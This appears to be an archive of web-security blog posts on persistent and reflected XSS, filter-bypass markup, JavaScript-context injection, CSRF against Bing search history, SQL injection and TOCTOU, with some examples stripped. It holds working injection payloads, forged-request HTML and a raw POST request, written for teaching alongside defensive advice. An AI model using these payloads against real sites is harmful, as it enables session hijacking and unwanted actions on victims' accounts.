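const cookies = setLocaleCookie('en_US"><script src=""></script>');
const page = renderContactPage(cookies);
console.log(page.includes('<script')); // true – the stored payload re-emerges
```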

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert() payload delivered in a URL parameter.

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And – spoiler alert – not in the following script block:

<script language="JavaScript" type="text/javascript">
//<![CDATA[<!--/* [ads in the cloud] Variables */
if(s.products) s.products = s.products.replace(/,$/,'');
if( =,/,'');
var s_code=s.t();

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">
//<![CDATA[<!--/* [ads in the cloud] Variables */ s.prop17="alert(9)";
if(s.products) s.products = s.products.replace(/,$/,'');
if( =,/,'');
var s_code=s.t();

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).

"%2balert(9)%2b"

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">
//<![CDATA[<!--/* [ads in the cloud] Variables */ s.prop17=""+alert(9)+"";
if(s.products) s.products = s.products.replace(/,$/,'');
if( =,/,'');
var s_code=s.t();

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content does not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.
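A sketch of that insecure pattern next to one safer alternative. JSON.stringify is used here only as an illustration; a complete defense for script contexts also escapes sequences like </script> and the U+2028/U+2029 line separators:

```javascript
// Why server-side string concatenation into a <script> block is unsafe.
// "cookieValue" stands in for attacker-controlled input from the tracking cookie.
const cookieValue = '"+alert(9)+"';

// Insecure: concatenation lets the value break out of the string literal.
const insecure = 's.prop17="' + cookieValue + '";';
console.log(insecure); // s.prop17=""+alert(9)+"";

// Safer: JSON.stringify escapes the quotes so the value stays a string literal.
const safer = 's.prop17=' + JSON.stringify(cookieValue) + ';';
console.log(safer); // s.prop17="\"+alert(9)+\"";
```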

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice if we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Plugins Stand Out

A minor theme in my recent B-Sides SF presentation was the stagnancy of innovation since HTML4 was finalized in December 1999. New programming patterns emerged over that time, only to be hobbled by the outmoded spec. To help recall that era I scoured for ancient curiosities of the last millennium. (Like Geocities’ announcement of 2MB of free hosting space.) One item I came across was a Netscape advisory regarding a Java bytecode vulnerability – in March 1996.

March 1996 Java Bytecode Vulnerability

Almost twenty years later Java still plagues browsers with continuous critical patches released month after month after month, including March 2013.

Java: Write none, uninstall everywhere.

The primary complaint against browser plugins is not their legacy of security problems (the list of which is exhausting to read). Nor is Java the only plugin to pick on; Flash has its own history of releasing nothing but critical updates. The greater issue is that even a secure plugin lives outside the browser’s Same Origin Policy (SOP).

When plugins exist outside the security and privacy controls enforced by browsers they weaken the browsing experience. It’s true that plugins aren’t completely independent of these controls; their instantiation and usage with regard to the DOM still falls under the purview of SOP. However, the ways that plugins extend a browser (such as network and file access) are rife with security and privacy pitfalls.

For one example, Flash’s Local Shared Object (LSO) was easily abused as an “evercookie” because it was unaffected by clearing browser cookies or by the browser’s settings for accepting cookies in the first place. Yes, it’s still possible to abuse HTTP and HTML to establish evercookies. Even the lauded HTML5 Local Storage API could be abused in a similar manner. It’s for reasons like these that we should be as diligent about demanding “privacy patches” as we are about demanding security fixes.
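The evercookie pattern itself is simple. This sketch uses stand-in objects for cookies and persistent storage so it runs outside a browser; in the wild, the persistent store would be an LSO, Local Storage, or similar:

```javascript
// Sketch of the "evercookie" pattern: a value cleared from cookies is silently
// restored from a longer-lived store. Stubs stand in for browser storage APIs.
const persistentStore = new Map();  // stand-in for LSO / localStorage
let cookies = {};

function setTracker(id) {
  cookies.track = id;
  persistentStore.set('track', id); // duplicate into persistent storage
}

function clearCookies() { cookies = {}; }

function respawn() {
  if (!cookies.track && persistentStore.has('track')) {
    cookies.track = persistentStore.get('track'); // tracker respawns
  }
}

setTracker('601F242A7B5ED42A');
clearCookies();
respawn();
console.log(cookies.track); // "601F242A7B5ED42A" – tracking survives cookie clearing
```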

Unlike Flash, an HTML5 API like Local Storage is an open standard created by groups who review and balance the usability, security, and privacy implications of features designed to improve the browsing experience. Establishing a feature like Local Storage in the HTML spec and aligning it with similar concepts like cookies and security controls like SOP (or HTML5 features like CORS, CSP, etc.) makes them a superior implementation in terms of integrating with users’ expectations and browser behavior. Instead of one vendor providing a means to extend a browser, browser vendors (the number of which is admittedly dwindling) are competing with each other to implement a uniform standard.

Sure, HTML5 brings new risks and preserves old vulnerabilities in new and interesting ways, but a large responsibility for those weaknesses lies with developers who would misuse an HTML5 feature in the same way they might have misused XHR and JSONP in the past. Maybe we’ll start finding plaintext passwords in Local Storage objects, or more sophisticated XSS exploits using Web Workers and WebSockets to scour data from a compromised browser. Security ignorance takes a long time to fix. And even experienced developers are challenged by maintaining the security of complex web applications.

HTML5 promises to obviate plugins altogether. We’ll have markup to handle video, drawing, sound, more events, and more features to create engaging games and apps. Browsers will compete on the implementation and security of these features rather than be crippled by the presence of plugins out of their control.


Getting rid of plugins makes our browsers more secure, but adopting HTML5 doesn’t imply browsers and web sites become secure. There are still vulnerabilities that we can’t fix by simple application design choices like including X-Frame-Options or adopting Content Security Policy headers.

Would you click on an unknown link – better yet, scan an inscrutable QR code – with your current browser? Would you still do it with multiple tabs open to your email, bank, and social networking accounts?

Who cares if “the network is the computer” or an application lives in the “cloud” or it’s offered via something as a service? It’s your browser that’s the door to web apps and, when it’s not secure, an open window to your data.

Condign Punishment


The article rate here slowed down in February due to my preparation for B-Sides SF and RSA 2013. I even had to give a brief presentation about Hacking Web Apps at my company’s booth. (Followed by a successful book signing. Thank you!)

In that presentation I riffed off several topics repeated throughout this site. One topic was the mass hysteria we are forced to suffer from web sites that refuse to write safe SQL statements.

Those of you who are developers may already be familiar with a SQL-related API, though some may not be aware that the acronym stands for Advanced Persistent Ignorance.

Here’s a slide I used in the presentation (slide 13 of 29). Since I didn’t have enough time to complete nine years of research I left blanks for the audience to fill in.

Advanced Persistent Ignorance

Now you can fill in the last line. Security company Bit9 admitted last week to a compromise that began with a SQL injection exploit. Sigh. The good news was that no massive database of usernames and passwords (hashed or not) went walkabout. The bad news was that attackers were able to digitally sign malware with a stolen Bit9 code-signing certificate.

I don’t know what I’ll add as a fill-in-the-blank for 2014. Maybe an entry for NoSQL. After all, developers love to reuse an API. String concatenation in JavaScript is no better than doing the same for SQL.

If we can’t learn from PHP’s history in this millennium, perhaps we can look further back for more fundamental lessons. The Greek historian Polybius noted how Romans protected passwords (watchwords) in his work, Histories1:

To secure the passing round of the watchword for the night the following course is followed. One man is selected from the tenth maniple, which, in the case both of cavalry and infantry, is quartered at the ends of the road between the tents; this man is relieved from guard-duty and appears each day about sunset at the tent of the Tribune on duty, takes the tessera or wooden tablet on which the watchword is inscribed, and returns to his own maniple and delivers the wooden tablet and watchword in the presence of witnesses to the chief officer of the maniple next his own; he in the same way to the officer of the next, and so on, until it arrives at the first maniple stationed next the Tribunes. These men are obliged to deliver the tablet (tessera) to the Tribunes before dark.

More importantly, the Romans included a consequence for violating the security of this process:

If they are all handed in, the Tribune knows that the watchword has been delivered to all, and has passed through all the ranks back to his hands: but if any one is missing, he at once investigates the matter; for he knows by the marks on the tablets from which division of the army the tablet has not appeared; and the man who is discovered to be responsible for its non-appearance is visited with condign punishment.

We truly need a fitting penalty for SQL injection vulnerabilities; perhaps only tempered by the judicious use of salted, hashed passwords.

  1. Polybius, Histories, trans. Evelyn S. Shuckburgh (London, New York: Macmillan, 1889), Perseus Digital Library (accessed March 5, 2013). 

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when it encounters unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies – giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lies at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on, anything other than a narrowly-focused regex becomes unwieldy at best.
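A two-line sketch shows how quickly pattern-matching loses to parsing. The hypothetical filter below assumes whitespace always follows an element name, which the parser does not require:

```javascript
// A naive regex filter for "<img ..." misses the slash-delimited variant
// that an HTML parser still treats as a perfectly good img tag.
const naiveImgFilter = /<img\s/i;  // assumes whitespace after the element name

console.log(naiveImgFilter.test('<img src="x" onerror=alert(9)>'));  // true – caught
console.log(naiveImgFilter.test('<img/src="x"onerror=alert(9)>'));   // false – bypassed
```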

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:

<img/src="x"onerror="alert(9)">
Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:
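The example is missing from this excerpt; judging from the adjusted variant shown shortly after, it would have looked like:

```html
<script/<a>alert(9)</script>
```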


We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad markup to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.


Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:


The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')"

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.
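Here’s a small sketch of that ordering problem (illustrative; the entity decoder is hand-rolled for the example):

```javascript
// Minimal numeric-entity decoder, just enough for this example.
const decodeEntities = s => s
  .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
  .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));

const looksSafe = url => !url.toLowerCase().startsWith('javascript:');

const evil = 'java&#115;cript:alert(9)';

// Check before decoding: the scheme looks harmless, so it's wrongly approved.
console.log(looksSafe(evil));                  // true
// Decode first, then check: the real scheme is visible and gets blocked.
console.log(looksSafe(decodeEntities(evil)));  // false
```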


User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit. It’s not uncommon for developers to denylist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers. A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns. Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters. You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly. Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.
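A minimal sketch of that encoding rule (the helper name is made up for the example; the entity mapping is standard):

```javascript
// Replace HTML metacharacters, including both quote styles, with entities.
const encodeAttr = s => s.replace(/[&<>"']/g, c => ({
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
}[c]));

const userInput = '"><script>alert(9)</script>';
const html = `<a href="/page?from=${encodeAttr(userInput)}">back</a>`;
console.log(html); // the payload renders as text, not markup
```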

HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, but not so myopic that they miss “improper” HTML constructs that a browser will happily render.

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voigt-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

That is unfortunate.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.
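The probe itself is missing from this excerpt, but the reflected code and the error-console URLs that follow imply something like:

```
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27
```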


The code now has an extra apostrophe hanging out at the end of pageUrl:

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'';
        if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
            var hflanguage = document.getElementById(getClientId().HfLanguage);
            hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

But when the devs go to check the vuln, they show that it’s not possible to issue an alert(). For example, they update the payload with something like this:
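Their attempt is missing from the excerpt; a typical variation that terminates the string might look like this (hypothetical):

```
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9);var%20b=%27
```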


None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.
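The payload is missing here, but it can be recovered from the reflected code that follows:

```
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);var%20a=%27
```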


The following code confirms that the site still reflects the payload. However, our browser still isn’t visited by the expected pop-up.

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

[14:36:45.923] SyntaxError: function statement requires a name @
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27 SomePage.aspx:345

[14:42:09.681] SyntaxError: syntax error @
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27 SomePage.aspx:345

(3) Capture the Function Body

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with commenting it out with the // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a=' inside the payload.

What we need to do is recapture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack: just update the payload with an opening function statement, as below:
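The payload is missing from the excerpt, but it survives in the first error-console URL shown earlier:

```
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27
```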


The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a' } alert(9); function(){ var a='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

Almost there. But the pop-up remains elusive.

(4) Var Your Function

Oops. We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but it at least needs a scope for unnamed, anonymous functions. For example, the following syntax creates and executes an anonymous function that generates an alert:
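The example is missing from this excerpt; the classic form of an immediately invoked anonymous function is:

```
(function(){ alert(9); })();
```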


We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.
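The payload is missing here, but it’s recoverable from the fully exploited page below:

```
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);var%20a=function(){var%20a=%27
```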


Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a' } alert(9); var a = function(){ var a ='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

What do you dream of? A world without HTML injection? Electric Sheep?

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.

User Agent. Secret Agent. Double Agent.

We hope our browsers are secure in light of the sites we choose to visit. What we often forget is whether we are secure in light of the sites our browsers choose to visit. Sometimes it’s hard to even figure out whose side our browsers are on.

Browsers act on our behalf, hence the term User Agent. They load HTML from the link we type in the navbar, then retrieve the resources defined in the HTML in order to fully render the site. The resources may be obvious, like images, or behind-the-scenes, like CSS that styles the page’s layout or JSON messages sent by XMLHttpRequest objects.

Then there are times when our browsers work on behalf of others, working as a Secret Agent to betray our data. They carry out orders delivered by Cross-Site Request Forgery (CSRF) exploits enabled by the very nature of HTML.

Part of HTML’s success is its capability to aggregate resources from different Origins into a single page. Check out the following HTML. It loads a CSS file, JavaScript functions, and two images from different hosts, all but one over HTTPS. None of it violates the Same Origin Policy. Nor is there an issue with loading different Origins with different SSL connections.

<!doctype html>
<link href="" rel="stylesheet" media="all" type="text/css" />
<script src=""></script>
<script>$(document).ready(function() { $("#main").text("Come together..."); });</script>
<img alt="" src="" />
<img alt="" src="" />
<div id="main" style="font-family: 'Open Sans';"></div>

CSRF attacks rely on being able to include resources from unrelated Origins in a single page. They’re not concerned with the Same Origin Policy since they are neither restricted by it nor need to break it (they don’t need to read or write across Origins). CSRF is concerned with a user’s context in relation to a web app – the data and state transitions associated with a user’s session, security, or privacy.

To get a sense of user context with regard to a site, let’s look at the Bing search engine. Click on the Preferences gear in the upper right corner to review your Search History. You’ll see a list of search terms like the following example:

Bing Search History

Bing’s Search box is an <input> field with parameter name “q”. Searching for a term – and therefore populating the Search History – is done when the form is submitted. Doing so creates a request for a link like this:
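The link itself is stripped from this excerpt; given the /search endpoint and the q parameter, it would take a form like this (illustrative):

```
http://www.bing.com/search?q=deadliest+web+attacks
```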

For a CSRF exploit to work, it’s important to be able to recreate a user’s request. In the case of Bing, an attacker need only craft a GET request to the /search page and populate the q parameter.

Forge a Request

We’ll use a CSRF attack to populate the user’s Search History without their knowledge. This requires luring the victim to a web page that’s able to forge (as in craft) a search request. If successful, the forged (as in fake) request will affect the user’s context (i.e. the Search History). One way to forge an automatic request is via the src attribute of an img tag. The following HTML would be hosted on some Origin unrelated to Bing, e.g. an attacker’s own site.

<!doctype html>
<img src="" style="visibility: hidden;" alt="" />

The victim has to visit the attacker’s web page or come across the img tag in a discussion forum or social media site. The user does not need to have Bing open in a different browser tab or otherwise be using Bing at the same time they come across the CSRF exploit. Once their browser encounters the booby-trapped page, the request updates their Search History even though they never typed “deadliest web attacks” into the search box.

Bing Search History CSRF

As a thought experiment, extend this from a search history “infection” to a social media status update, or changing an account’s email address (to the attacker’s), or changing a password (to something the attacker knows), or any other action that affects the user’s security or privacy.

The trick is that CSRF requires full knowledge of the request’s parameters in order to successfully forge it. That kind of forgery (as in faking a legitimate request) deserves another article to explore fully. For example, if you had to supply the old password in order to update a new password, then you wouldn’t need a CSRF attack – just log in with the known password. For another example, imagine Bing randomly assigned a letter to users’ search requests. One user’s request might use a “q” parameter, whereas another user’s request relies instead on an “s” parameter. If the parameter name didn’t match the one assigned to the user, then Bing would reject the search request. The attacker would have to predict the parameter name. Or, if the sample space were small, fake each possible combination – which would be only 26 letters in this imagined scenario.

Crafty Crafting

We’ll end on the easier aspect of forgery (as in crafting). Browsers automatically load resources from the src attributes of elements like img, iframe, and script (or the href attribute of a link). If an action can be faked by a GET request, that’s the easiest way to go.

HTML5 gives us another nifty way to forge requests using Content Security Policy directives. We’ll invert the expected usage of CSP by intentionally creating an element that violates a restriction. The following HTML defines a CSP rule that forbids src attributes (default-src 'none') and a URL to report rule violations. The victim’s browser must be lured to this page, either through social engineering or by placing it on a commonly-visited site that permits user-uploaded HTML.

<!doctype html>
<meta http-equiv="X-WebKit-CSP" content="default-src 'none'; report-uri" />
<img alt="" src="/" />

The report-uri directive makes the browser submit a POST request to the specified link. Being able to generate a POST is highly attractive for CSRF attacks. However, the usefulness of this technique is tempered by the fact that it’s not possible to add arbitrary name/value pairs to the POST data. The browser will percent-encode the values for the “document-url” and “violated-directive” parameters. Unless the browser incorrectly implements CSP reporting, it’s a half-successful measure at best.

POST /search?q=deadliest%20web%20attacks%20CSP HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Content-Length: 121
Origin: null
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

There’s far more to finding and exploiting CSRF vulnerabilities than covered here. We didn’t mention risk, which in this example is low (there’s questionable benefit to the attacker or detriment to the victim; you can even turn the history feature off; and the feature is presented clearly rather than hidden in an obscure privacy setting). But the Bing example demonstrates the essential mechanics of an attack:

  • A site tracks per-user contexts.
  • A request is known to modify that context.
  • The request can be recreated by an attacker (i.e. parameter names and values are predictable without direct access to the victim’s context).
  • The forged request can be placed on a page unrelated to the site (i.e. in a different Origin) where the victim’s browser comes across it.
  • The victim’s browser submits the forged request and affects the user’s context (this usually requires the victim to be currently authenticated to the site).

Later on, we’ll explore attacks that affect a user’s security context and differentiate them from nuisance attacks or attacks with negligible impact to the user. We’ll also examine the forging of requests, including challenges of creating GET and POST requests. Then we’ll heighten those challenges against the attacker and explore ways to counter CSRF attacks.

Until then, consider who your User Agent is really working for. It might not be who you expect.

“We are what we pretend to be, so we must be careful about what we pretend to be.” — Kurt Vonnegut, Introduction to Mother Night.


Effective security boundaries require conclusive checks (data is or is not valid) with well-defined outcomes (access is or is not granted). Yet the passage between boundaries is fraught with danger. As the twin-faced Roman god Janus watched over doors and gates – areas of transition – so does the twin-faced demon of insecurity, TOCTOU, infiltrate web apps.

The TOCTOU demon’s faces watch the state of data or resources within an app. The two sides are named:

  • Time of check (TOC) – When the resource is inspected. For example, all data from the browser is considered “tainted” because a malicious user may have manipulated it. If the data passes a validation function, then the taint may be removed and the data permitted entry deeper into the app. For example, the app checks whether an email address is well-formed or text contains <script> tags.
  • Time of use (TOU) – When the app performs an operation on the resource. For example, inserting the data into a SQL statement or inserting text into a web page. Weaknesses occur when the app assumes the state of the resource has not changed since the last check; vulnerabilities occur when the state change relates to a security control.

Boundaries are intended to protect web apps from unauthorized access and malicious data. They may be enforced by programming patterns like parameterized SQL statements that ensure query data cannot corrupt query grammar, or access controls that ensure a user has permission to view data. We see security boundaries when encountering invalid certs. The browser blocks the request with a dire warning that “bad things” might be happening, then asks the user if they want to continue anyway. (As browser boundaries go, that one’s probably the most visible and least effective.)

Ideally, security checks are robust enough to prevent malicious data from entering the app and being used to the attacker’s benefit. But there are subtle problems to avoid in the time between when a resource is checked (TOC) and when the app uses that resource (TOU), specifically duration and transformation.

One way to illustrate a problem in the duration of time between TOC and TOU is in an access control mechanism. User Alice has been granted admin access to a system on Monday. She logs in on Monday and keeps her session active. On Tuesday her access is revoked. But the security check for revoked access only occurs at login time. Since she maintained an active session, her admin rights remain valid.

Another example would be bidding for an item. Alice has a set of tokens with which she can bid. The bidding algorithm requires users to have sufficient tokens before they may bid on an item. In this case, Alice starts off with enough tokens for a bid, but bids with a lower number than her total. The bid is accepted. Then, she bids again with an amount far beyond her total. But the app failed to check the second bid, having already seen that she has more than enough to cover her bid. Or, she could bid the same total on a different item. Now she’s committed more than her total to two different items, which will be problematic if she wins both.

In both cases, state information has changed between the TOC and TOU. The security weakness was not marking the resource as newly tainted upon each change, thereby assuming the outcome of a previous check remained valid. You might apply a technical solution to the first problem: conduct the privilege check upon each use rather than first use (the privilege checks in the Unix sudo command can be configured as never, always, or first use within a specific duration). You might solve the second problem with a policy solution: punish users who fail to meet bids with fines or account suspension. One of the challenges of state transitions is that the app doesn’t always have omniscient perception.

Transformation of data between the TOC and TOU is another potential security weakness. A famous web-related example was the IIS “overlong UTF-8” vulnerability from 2000 (famous because it was successfully exploited by worms for months after Microsoft released patches). Web servers must be careful to restrict file access to the web document root. Otherwise, an attacker could use a directory traversal attack to gain unauthorized access to the file system. For example, the IIS vuln was exploited to reach the cmd.exe command if the app’s pages were stored on the same volume as the Windows system32 directory. All the attacker needed to do was submit a URL like the following:
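The URL is missing from this excerpt; the widely documented exploit took this shape (the host is a placeholder), with %c0%af serving as the overlong encoding of the slash:

```
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
```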
